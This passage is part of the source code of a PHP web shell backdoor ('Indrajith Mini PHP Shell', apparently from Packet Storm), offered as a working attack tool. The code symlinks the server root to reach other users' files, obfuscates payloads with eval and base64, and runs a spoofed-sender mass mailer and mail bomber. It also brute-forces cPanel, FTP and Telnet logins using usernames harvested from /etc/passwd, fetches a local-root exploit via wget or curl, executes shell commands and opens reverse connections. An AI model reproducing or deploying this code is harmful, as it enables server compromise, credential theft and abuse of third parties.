/>"); } else { $htaccess=@fopen('AKP/.htaccess', 'w'); fwrite($htaccess,$sym_htaccess); $php_ini_x=fopen('AKP/php.ini', 'w'); fwrite($php_ini_x, $sym_php_ini); symlink("/", "AKP/root"); echo "<table class=table><tr><td>Domains</td><td>Users</td><td>Exploit</font></td></tr>"; foreach($akps as $akp) { if(eregi("zone", $akp)) { preg_match_all('#zone "(.*)" #', $akp, $akpzz); flush(); if(strlen(trim($akpzz[1][0]))>2) { $user=posix_getpwuid(@fileowner("/etc/valiases/".$akpzz[1][0])); echo "<tr><td><a href=http://www.".$akpzz[1][0]." target=_blank>".$akpzz[1][0]."</a><td>".$user['name']."</td><td><a href=/AKP/root/home/".$user['name']."/public_html/ target=_blank>SymLink</a></td></tr></table>"; flush(); } } } }}function php_ende_ui(){ echo "<div id=result><center><h2>PHP ENCODE/DECODE</h2></center><hr /><form method='post'><table class=tbl> <tr><td> Method : <select name='typed' style='color:green; background-color:black; border:1px solid #666;'><option>Encode</option><option>Decode</decode></select> TYPE : <select name='typenc' style='color:green; background-color:black; border:1px solid #666;'><option>GZINFLATE</option><option>GZUNCOMPRESS</option><option>STR_ROT13</option></tr> </td><tr><td><textarea spellcheck='false' class=textarea_edit cols='80' rows='25' name='php_content'>INPUT YOUR CONTENT TO ENCODE/DECODEFor Encode Input your full source code.For Decode Input the encoded part only.</textarea></tr></td></table><hr /><input class='input_big' type='submit' value=' >> ' /><br /><hr /><br /><br /></form></div>";}function php_ende_bg(){ $meth_d=$_POST['typed']; $typ_d=$_POST['typenc']; $c_ntent=$_POST['php_content']; $c_ntent=$c_ntent; switch($meth_d) { case "Encode": switch($typ_d) { case "GZINFLATE": $res_t=base64_encode(gzdeflate(trim(stripslashes($c_ntent.' '),'<?php, ?>'),9)); $res_t="<?php /* Encoded in INDRAJITH SHELL PROJECT */ eval(gzinflate(base64_decode(\"$res_t\"))); ?>"; break; case "GZUNCOMPRESS": $res_t=base64_encode(gzcompress(trim(stripslashes($c_ntent.' '),'<?php, ?>'),9)); $res_t="<?php /* Encoded in INDRAJITH SHELL PROJECT */ eval(gzuncompress(base64_decode(\"$res_t\"))); ?>"; break; case "STR_ROT13": $res_t=trim(stripslashes($c_ntent.' '),'<?php, ?>'); $res_t=base64_encode(str_rot13($res_t)); $res_t="<?php /* Encoded in INDRAJITH SHELL PROJECT */ eval(str_rot13(base64_decode(\"$res_t\"))); ?>"; break; } break; case "Decode": switch($typ_d) { case "GZINFLATE": $res_t=gzinflate(base64_decode($c_ntent)); break; case "GZUNCOMPRESS": $res_t=gzuncompress(base64_decode($c_ntent)); break; case "STR_ROT13": $res_t=str_rot13(base64_decode($c_ntent)); break; } break; } echo "<div id=result><center><h2>INDRAJITH SHELL</h2><hr /><textarea spellcheck='false' class=textarea_edit cols='80' rows='25'>".htmlspecialchars($res_t)."</textarea></center></div>";}function massmailer_ui(){ echo "<div id=result><center><h2>MASS MAILER & MAIL BOMBER</h2><hr /><table class=tbl width=40 style='col-width:40'><td><table class=tbl><tr style='float:left;'><td><font color=green size=4>Mass Mail</font></td></tr><form method='POST'><tr style='float:left;'><td> FROM : </td><td><input name='from' size=40 value='ajithkp560@fbi.gov'></td></tr><tr style='float:left;'><td>TO :</td><td><input size=40 name='to_mail' value='ajithkp560@gmail.com,ajithkp560@yahoo.com'></td></tr><tr style='float:left;'><td>Subject :</td><td><input size=40 name='subject_mail' value='Hi, GuyZ'></td></tr><tr style='float:left;'><td><textarea spellcheck='false' class=textarea_edit cols='34' rows='10' name='mail_content'>I'm doing massmail </textarea></td><td><input class='input_big' type='submit' value=' >> '></td></tr></form></table></td> <form method='post'><td> <table class='tbl'><td><font color=green size=4>Mail Bomber</font></td></tr><tr style='float:left;'><td>TO : </td><td><input size=40 name='bomb_to' value='ajithkp560@gmail.com,ajithkp560_mail_bomb@fbi.gov'></td></tr><tr style='float:left;'><td>Subject : </td><td><input size=40 name='bomb_subject' value='Bombing with messages'></td></tr><tr style='float:left;'><td>No. of times</td><td><input size=40 name='bomb_no' value='100'></td></tr><tr style='float:left;'><td> <textarea spellcheck='false' class=textarea_edit cols='34' rows='10' name='bmail_content'>I'm doing E-Mail Bombing </textarea> </td><td><input class='input_big' type='submit' value=' >> '></td></tr></form></table> </td></tr></table>";}function massmailer_bg(){ $from=$_POST['from']; $to=$_POST['to_mail']; $subject=$_POST['subject_mail']; $message=$_POST['mail_content']; if(function_exists('mail')) { if(mail($to,$subject,$message,"From:$from")) { echo "<div id=result><center><h2>MAIL BOMBING</h2><hr /><br /><br /><font color=green size=4>Successfully Mails Send... </font><br /><br /><hr /><br /><br />"; } else { echo "<div id=result><center><h2>MAIL BOMBING</h2><hr /><br /><br /><font color=red size=4>Sorry, failed to Mails Sending... </font><br /><br /><hr /><br /><br />"; } } else { echo "<div id=result><center><h2>MAIL BOMBING</h2><hr /><br /><br /><font color=red size=4>Sorry, failed to Mails Sending... </font><br /><br /><hr /><br /><br />"; }}function mailbomb_bg(){ $rand=rand(0, 9999999); $to=$_POST['bomb_to']; $from="president_$rand@whitewhitehouse.gov"; $subject=$_POST['bomb_subject']." ID ".$rand; $times=$_POST['bomb_no']; $content=$_POST['bmail_content']; if($times=='') { $times=1000; } while($times--) { if(function_exists('mail')) { if(mail($to,$subject,$message,"From:$from")) { echo "<div id=result><center><h2>MAIL BOMBING</h2><hr /><br /><br /><font color=green size=4>Successfully Mails Bombed... </font><br /><br /><hr /><br /><br />"; } else { echo "<div id=result><center><h2>MAIL BOMBING</h2><hr /><br /><br /><font color=red size=4>Sorry, failed to Mails Bombing... </font><br /><br /><hr /><br /><br />"; } } else { echo "<div id=result><center><h2>MAIL BOMBING</h2><hr /><br /><br /><font color=red size=4>Sorry, failed to Mails Bombing... </font><br /><br /><hr /><br /><br />"; } }}/* ----------------------- CPANEL CRACK is Copied from cpanel cracker ----------*//*------------------------ Credit Goes to Them ---------------------------------*/function cpanel_check($host,$user,$pass,$timeout){ set_time_limit(0); global $cpanel_port; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "http://$host:" . $cpanel_port); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC); curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass"); curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout); curl_setopt($ch, CURLOPT_FAILONERROR, 1); $data = curl_exec($ch); if ( curl_errno($ch) == 28 ) { print "<b><font color=orange>Error :</font> <font color=red>Connection Timeout. Please Check The Target Hostname .</font></b>"; exit; } else if (curl_errno($ch) == 0 ) { print "<b><font face=\"Tahoma\" style=\"font-size: 9pt\" color=\"orange\">[~]</font></b><font face=\"Tahoma\" style=\"font-size: 9pt\"><b><font color=\"green\"> Cracking Success With Username "</font><font color=\"#FF0000\">$user</font><font color=\"#008000\">\" and Password \"</font><font color=\"#FF0000\">$pass</font><font color=\"#008000\">\"</font></b><br><br>"; } curl_close($ch);}function cpanel_crack(){ set_time_limit(0); global $os; echo "<div id=result>"; $cpanel_port="2082"; $connect_timeout=5; if(!isset($_POST['username']) && !isset($_POST['password']) && !isset($_POST['target']) && !isset($_POST['cracktype'])) { ?> <center> <form method=post> <table class=tbl> <tr> <td align=center colspan=2>Target : <input type=text name="server" value="localhost" class=sbox></td> </tr> <tr> <td align=center>User names</td><td align=center>Password</td> </tr> <tr> <td align=center><textarea spellcheck='false' class=textarea_edit name=username rows=25 cols=35 class=box><?php if($os != "win") { if(@file('/etc/passwd')) { $users = file('/etc/passwd'); foreach($users as $user) { $user = explode(':', $user); echo $user[0] . "\n"; } } else { $temp = ""; $val1 = 0; $val2 = 1000; for(;$val1 <= $val2;$val1++) { $uid = @posix_getpwuid($val1); if ($uid) $temp .= join(':',$uid)."\n"; } $temp = trim($temp); if($file5 = fopen("test.txt","w")) { fputs($file5,$temp); fclose($file5); $file = fopen("test.txt", "r"); while(!feof($file)) { $s = fgets($file); $matches = array(); $t = preg_match('/\/(.*?)\:\//s', $s, $matches); $matches = str_replace("home/","",$matches[1]); if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named") continue; echo $matches; } fclose($file); } } } ?></textarea></td><td align=center><textarea spellcheck='false' class=textarea_edit name=password rows=25 cols=35 class=box></textarea></td> </tr> <tr> <td align=center colspan=2>Guess options : <label><input name="cracktype" type="radio" value="cpanel" checked> Cpanel(2082)</label><label><input name="cracktype" type="radio" value="ftp"> Ftp(21)</label><label><input name="cracktype" type="radio" value="telnet"> Telnet(23)</label></td> </tr> <tr> <td align=center colspan=2>Timeout delay : <input type="text" name="delay" value=5 class=sbox></td> </tr> <tr> <td align=center colspan=2><input type="submit" value=" Go " class=but></td> </tr> </table> </form> </center> <?php } else { if(empty($_POST['username']) || empty($_POST['password'])) echo "<center>Please Enter The Users or Password List</center>"; else { $userlist=explode("\n",$_POST['username']); $passlist=explode("\n",$_POST['password']); if($_POST['cracktype'] == "ftp") { foreach ($userlist as $user) { $pureuser = trim($user); foreach ($passlist as $password ) { $purepass = trim($password); ftp_check($_POST['target'],$pureuser,$purepass,$connect_timeout); } } } if ($_POST['cracktype'] == "cpanel" || $_POST['cracktype'] == "telnet") { if($cracktype == "telnet") { $cpanel_port="23"; } else $cpanel_port="2082"; foreach ($userlist as $user) { $pureuser = trim($user); echo "<b><font face=Tahoma style=\"font-size: 9pt\" color=#008000> [ - ] </font><font face=Tahoma style=\"font-size: 9pt\" color=#FF0800> Processing user $pureuser ...</font></b><br><br>"; foreach ($passlist as $password ) { $purepass = trim($password); cpanel_check($_POST['target'],$pureuser,$purepass,$connect_timeout); } } } } } echo "</div>";}function get_users(){ $userz = array(); $user = file("/etc/passwd"); foreach($user as $userx=>$usersz) { $userct = explode(":",$usersz); array_push($userz,$userct[0]); } if(!$user) { if($opd = opendir("/home/")) { while(($file = readdir($opd))!== false) { array_push($userz,$file); } } closedir($opd); } $userz=implode(', ',$userz); return $userz;}function exploit_details(){ global $os; echo "<div id=result style='color:green;'><center> <h2>Exploit Server Details</h2><hr /><br /><br /><table class=table style='color:green;text-align:center'><tr><td> OS: <a style='color:7171C6;text-decoration:none;' target=_blank href='http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=".php_uname(s)."'>".php_uname(s)."</td></tr> <tr><td>PHP Version : <a style='color:7171C6;text-decoration:none;' target=_blank href='?phpinfo'>".phpversion().".</td></tr> <tr><td>Kernel Release : <font color=7171C6>".php_uname(r)."</font></td></tr> <tr><td>Kernel Version : <font color=7171C6>".php_uname(v)."</font></td></td> <tr><td>Machine : <font color=7171C6>".php_uname(m)."</font></td</tr> <tr><td>Server Software : <font color=7171C6>".$_SERVER['SERVER_SOFTWARE']."</font></td</tr><tr>"; if(function_exists('apache_get_modules')) { echo "<tr><td style='text-align:left;'>Loaded Apache modules : <br /><br /><font color=7171C6>"; echo implode(', ', apache_get_modules()); echo "</font></tr></td>"; } if($os=='win') { echo "<tr><td style='text-align:left;'>Account Setting : <font color=7171C6><pre>".cmd('net accounts')."</pre></td></tr> <tr><td style='text-align:left'>User Accounts : <font color=7171C6><pre>".cmd('net user')."</pre></td></tr> "; } if($os=='nix') { echo "<tr><td style='text-align:left'>Distro : <font color=7171C6><pre>".cmd('cat /etc/*-release')."</pre></font></td></tr> <tr><td style='text-align:left'>Distr name : <font color=7171C6><pre>".cmd('cat /etc/issue.net')."</pre></font></td></tr> <tr><td style='text-align:left'>GCC : <font color=7171C6><pre>".cmd('whereis gcc')."</pre></td></tr> <tr><td style='text-align:left'>PERL : <font color=7171C6><pre>".cmd('whereis perl')."</pre></td></tr> <tr><td style='text-align:left'>PYTHON : <font color=7171C6><pre>".cmd('whereis python')."</pre></td></tr> <tr><td style='text-align:left'>JAVA : <font color=7171C6><pre>".cmd('whereis java')."</pre></td></tr> <tr><td style='text-align:left'>APACHE : <font color=7171C6><pre>".cmd('whereis apache')."</pre></td></tr> <tr><td style='text-align:left;'>CPU : <br /><br /><pre><font color=7171C6>".cmd('cat /proc/cpuinfo')."</font></pre></td></tr> <tr><td style='text-align:left'>RAM : <font color=7171C6><pre>".cmd('free -m')."</pre></td></tr> <tr><td style='text-align:left'> User Limits : <br /><br /><font color=7171C6><pre>".cmd('ulimit -a')."</pre></td></tr>"; $useful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl'); $uze=array(); foreach($useful as $uzeful) { if(cmd("which $uzeful")) { $uze[]=$uzeful; } } echo "<tr><td style='text-align:left'>Useful : <br /><font color=7171C6><pre>"; echo implode(', ',$uze); echo "</pre></td></tr>"; $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror'); $uze=array(); foreach($downloaders as $downloader) { if(cmd("which $downloader")) { $uze[]=$downloader; } } echo "<tr><td style='text-align:left'>Downloaders : <br /><font color=7171C6><pre>"; echo implode(', ',$uze); echo "</pre></td></tr>"; echo "<tr><td style='text-align:left'>Users : <br /><font color=7171C6><pre>".wordwrap(get_users())."</pre</font>></td></tr> <tr><td style='text-align:left'>Hosts : <br /><font color=7171C6><pre>".cmd('cat /etc/hosts')."</pre></font></td></tr>"; } echo "</table><br /><br /><hr /><br /><br />";}function remote_file_check_ui(){ echo "<div id=result><center><h2>Remote File Check</h2><hr /><br /><br /> <table class=tbl><form method='POST'><tr><td>URL : <input size=50 name='rem_web' value='http://www.ajithkp560.hostei.com/php/'></td></tr> <tr><td><font color=red>Input File's Names in TextArea</font></tr></td><tr><td><textarea spellcheck='false' class='textarea_edit' cols=50 rows=30 name='tryzzz'>indrajith.phpajithkp560.phpindex.htmlprofile.phpc99.phpr57.php</textarea></td></tr> <tr><td><br /><input type='submit' value=' >> ' class='input_big' /><br /><br /></td></tr></form></table><br /><br /><hr /><br /><br />";}function remote_file_check_bg(){ set_time_limit(0); $rtr=array(); echo "<div id=result><center><h2>Scanner Report</h2><hr /><br /><br /><table class=tbl>"; $webz=$_POST['rem_web']; $uri_in=$_POST['tryzzz']; $r_xuri = trim($uri_in); $r_xuri=explode("\n", $r_xuri); foreach($r_xuri as $rty) { $urlzzx=$webz.$rty; if(function_exists('curl_init')) { echo "<tr><td style='text-align:left'><font color=orange>Checking : </font> <font color=7171C6> $urlzzx </font></td>"; $ch = curl_init($urlzzx); curl_setopt($ch, CURLOPT_NOBODY, true); curl_exec($ch); $status_code=curl_getinfo($ch, CURLINFO_HTTP_CODE); curl_close($ch); if($status_code==200) { echo "<td style='text-align:left'><font color=green> Found....</font></td></tr>"; } else { echo "<td style='text-align:left'><font color=red>Not Found...</font></td></tr>"; } } else { echo "<font color=red>cURL Not Found</font>"; } } echo "</table><br /><br /><hr /><br /><br /></div>";}function remote_download_ui(){ echo "<div id=result><center><h2>Remote File Download</h2><hr /><br /><br /><table class=tbl><form method='GET'><input type=hidden name='path' value=".getcwd()."><tr><td><select style='color:green; background-color:black; border:1px solid #666;' name='type_r_down'><option>WGET</option><option>cURL</option></select></td></tr> <tr><td>URL <input size=50 name='rurlfile' value='ajithkp560.hostei.com/localroot/2.6.x/h00lyshit.zip'></td></tr> <tr><td><input type='submit' class='input_big' value=' >> ' /></td></tr></form></table><br /><br /><hr /><br /><br /></div>";}function remote_download_bg(){ chdir($_GET['path']); global $os; $opt=$_GET['type_r_down']; $rt_ffile=$_GET['rurlfile']; $name=basename($rt_ffile); echo "<div id=result>"; switch($opt) { case "WGET": if($os!='win') { cmd("wget $rt_ffile"); alert("Downloaded Successfully..."); } else { alert("Its Windows OS... WGET is not available"); } break; case "cURL": if(function_exists('curl_init')) { $ch = curl_init($rt_ffile); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $data = curl_exec($ch); curl_close($ch); file_put_contents($name, $data); alert("Download succeeded"); } else { alert("cURL Not Available"); } break; } echo "</div>";}function hex_encode_ui(){ if(isset($_REQUEST['hexinp']) && isset($_REQUEST['tyxxx'])) { $tyx=$_POST['tyxxx']; $rezultzz=$_POST['hexinp']; switch($tyx) { case "Encode": $rzul=PREG_REPLACE("'(.)'e","dechex(ord('\\1'))",$rezultzz); echo "<div id=result><center><h2>HEXADECIMAL ENCODER</h2><hr /><br /><br /> <textarea class='textarea_edit' spellcheck=false cols=60 rows=10>$rzul</textarea> <br /><br /><form method='POST'><select style='color:green; background-color:black; border:1px solid #666;' name='tyxxx'><option>Encode</option><option>Decode</option></select> Input : <input name='hexinp' size=50 value='input here'><input type=submit value=' >> ' /><br /><br /><hr /><br /><br /></div>"; break; case "Decode": $rzul=PREG_REPLACE("'([\S,\d]{2})'e","chr(hexdec('\\1'))",$rezultzz); echo "<div id=result><center><h2>HEXADECIMAL ENCODER</h2><hr /><br /><br /> <textarea class='textarea_edit' spellcheck=false cols=60 rows=10>$rzul</textarea> <br /><br /><form method='POST'><select style='color:green; background-color:black; border:1px solid #666;' name='tyxxx'><option>Encode</option><option>Decode</option></select> Input : <input name='hexinp' size=50 value='input here'><input type=submit value=' >> ' /><br /><br /><hr /><br /><br /></div>"; break; } } else { echo "<div id=result><center><h2>HEXADECIMAL ENCODER</h2><hr /><br /><br /> <textarea class='textarea_edit' spellcheck=false cols=60 rows=10>Here visible Your Result</textarea> <br /><br /><form method='POST'><select style='color:green; background-color:black; border:1px solid #666;' name='tyxxx'><option>Encode</option><option>Decode</option></select> Input : <input name='hexinp' size=50 value='input here'><input type=submit value=' >> ' /><br /><br /><hr /><br /><br /></div>"; }}function about_us(){ echo "<div id=result style='boder:1px double dashed #333'><center><h2>About us</h2><hr /><br /><br /> <font color=red><h4>AJITH KP & VISHNU NATH KP</h4></font> We are brothersz & dedicated this to my <br /> <font color=green>\"Father [Devadasan KP] and Mother[Prakasini AP]\"</font><br />My classmates and teachers.<br />and my buddy <font color=orange>SREEJU</font> <br />And all friends, teachers in <font color=green>AMSTECK ATRS AND SCIENCE COLLEGE [BCA & BSc]</font> <br /><font color=green>Amteck : Dheeraj, Jhelai, Ashwin, Arjun,etc...<br /> ToF : Coded32 [who forced me to concentrate in Programming], Null|Void, Al3x,John,etc.<br /> Indishell : d@rkwolf,ash3ll & Sen[Who teach me the first lessons]</font><br /><br /><br /><br /><hr /><br /><br /><br /><br /></center></div>";}function killme(){ global $self; echo "<div id=result><center><h2>Good Bye Dear</h2><hr />Dear, Good by... Hope You Like me...<br /><br /><br/><hr /><br /><br />"; $me=basename($self); unlink($me);}//////////////////////////////// Frond End Calls ///////////////////////////////if(isset($_POST['e_file']) && isset($_POST['e_content_n'])){ edit_file_bg();}else if(isset($_REQUEST['killme'])){ killme();}else if(isset($_REQUEST['hexenc'])){ hex_encode_ui();}else if(isset($_REQUEST['about_us'])){ about_us();}else if(isset($_REQUEST['remotefiledown'])){ remote_download_ui();}else if(isset($_GET['type_r_down']) && isset($_GET['rurlfile']) && isset($_GET['path'])){ remote_download_bg();}else if(isset($_REQUEST['cpanel_crack'])){ cpanel_crack();}else if(isset($_REQUEST['rem_web']) && isset($_REQUEST['tryzzz'])){ remote_file_check_bg();}else if(isset($_REQUEST['typed']) && isset($_REQUEST['typenc']) && isset($_REQUEST['php_content'])){ php_ende_bg();}else if(isset($_REQUEST['remote_server_scan'])){ remote_file_check_ui();}else if(isset($_REQUEST['server_exploit_details'])){ exploit_details();}else if(isset($_REQUEST['from']) && isset($_REQUEST['to_mail']) && isset($_REQUEST['subject_mail']) && isset($_REQUEST['mail_content'])){ massmailer_bg();}else if(isset($_REQUEST['mysqlman'])){ mysqlman();}else if(isset($_REQUEST['bomb_to']) && isset($_REQUEST['bomb_subject']) && isset($_REQUEST['bmail_content'])){ mailbomb_bg();}else if(isset($_REQUEST['cookiejack'])){ cookie_jack();}else if(isset($_REQUEST['massmailer'])){ massmailer_ui();}else if(isset($_REQUEST['rename'])){ chdir($_GET['path']); rename_ui();}else if(isset($_GET['old_name']) && isset($_GET['new_name'])){ chdir($_GET['path']); rename_bg();}else if(isset($_REQUEST['encodefile'])){ php_ende_ui();}else if(isset($_REQUEST['edit'])){ edit_file(); }else if(isset($_REQUEST['down'])){ chdir($_GET['path']); download();}else if(isset($_REQUEST['read'])){ chdir($_GET['path']); code_viewer();}else if(isset($_REQUEST['perm'])){ chdir($_GET['path']); ch_perm_ui();}else if(isset($_GET['path']) && isset($_GET['p_filex']) && isset($_GET['new_perm'])){ chdir($_GET['path']); ch_perm_bg();}else if(isset($_REQUEST['del_fil'])){ chdir($_GET['path']); delete_file(); exit;}else if(isset($_REQUEST['phpinfo'])){ chdir($_GET['path']); ob_clean(); echo phpinfo(); exit;}else if(isset($_REQUEST['del_dir'])){ chdir($_GET['path']); $d_dir=$_GET['del_dir']; deldirs($d_dir);}else if(isset($_GET['path']) && isset($_GET['new_file'])){ chdir($_GET['path']); mk_file_ui();}else if(isset($_GET['path']) && isset($_GET['new_f_name']) && isset($_GET['n_file_content'])){ mk_file_bg();}else if(isset($_GET['path']) && isset($_GET['new_dir'])){ chdir($_GET['path']); create_dir();}else if(isset($_GET['path']) && isset($_GET['cmdexe'])){ chdir($_GET['path']); cmd();}else if(isset($_POST['upload_f']) && isset($_POST['path'])){ upload_file();}else if(isset($_REQUEST['rs'])){ reverse_conn_ui();}else if(isset($_GET['rev_option']) && isset($_GET['my_ip']) && isset($_GET['my_port'])){ reverse_conn_bg();}else if(isset($_REQUEST['safe_mod']) && isset($_REQUEST['path'])){ chdir($_GET['path']); safe_mode_fuck_ui();}else if(isset($_GET['path']) && isset($_GET['safe_mode'])){ safe_mode_fuck();}else if(isset($_GET['path']) && isset($_REQUEST['forbd_dir'])){ AccessDenied();}else if(isset($_REQUEST['symlink'])){ sym_link();}else if(isset($_GET['dbz']) && isset($_GET['db_user']) && isset($_GET['db_password']) && isset($_GET['db_port'])){ SQL_Shell_bg();}else if(isset($_GET['path']) && isset($_GET['copy'])){ copy_file_ui();}else if(isset($_GET['c_file']) && isset($_GET['c_target']) &&isset($_GET['cn_name'])){ copy_file_bg();}else{ filemanager_bg();}////////////////////////////// End Frond End Calls //////////////////////////////echo "</div><div id=result><center><p><table class='tbl'> <tr><td><form method='GET'>PWD : <input size='50' name='path' value=".getcwd()."><input type='submit' value=' >> ' /></form></td></tr></table> <table class='tbl'><tr> <td><form style='float:right;' method='GET'><input name='path' value=".getcwd()." type=hidden><span> New File : </span><input type='submit' value=' >> ' ><input size='40' name='new_file' /></form> </td> <td><form style='float:left;' method='GET'><input name='path' value=".getcwd()." type=hidden><input size='40' name='new_dir'><input type='submit' value=' >> ' /><span> : New Dir</span></form> </td> </tr> <tr> <td><form style='float:right;' method='GET'><input style='float:left;' name='path' value=".getcwd()." type=hidden><span>CMD : </span><input type='submit' value=' >> ' ><input name='cmdexe' size='40' /></form> </td> <td><form style='float:left;' method='POST' enctype=\"multipart/form-data\"><input name='path' value=".getcwd()." type=hidden><input size='27' name='upload_f' type='file'><input type='submit' name='upload_f' value=' >> ' /><span> : Upload File</span></form> </td> </tr> </table></p><p><font size=4 color=green>© <a style='color:green; text-decoration:none;' href=http://facebook.com/ajithkp560>AJITH KP</a> & <a style='color:green; text-decoration:none;' href='http://www.facebook.com/vishnunathkp'>VISHNU NATH KP</a> ©</font><br />® TOF [2012] ®</div>"?>/*------------------ LOGIN -------------------*/$usernameame="ajithkp560";$password="ajithkp560";Indrajith Mini PHP Shell Backdoor ? Packet Storm Quote
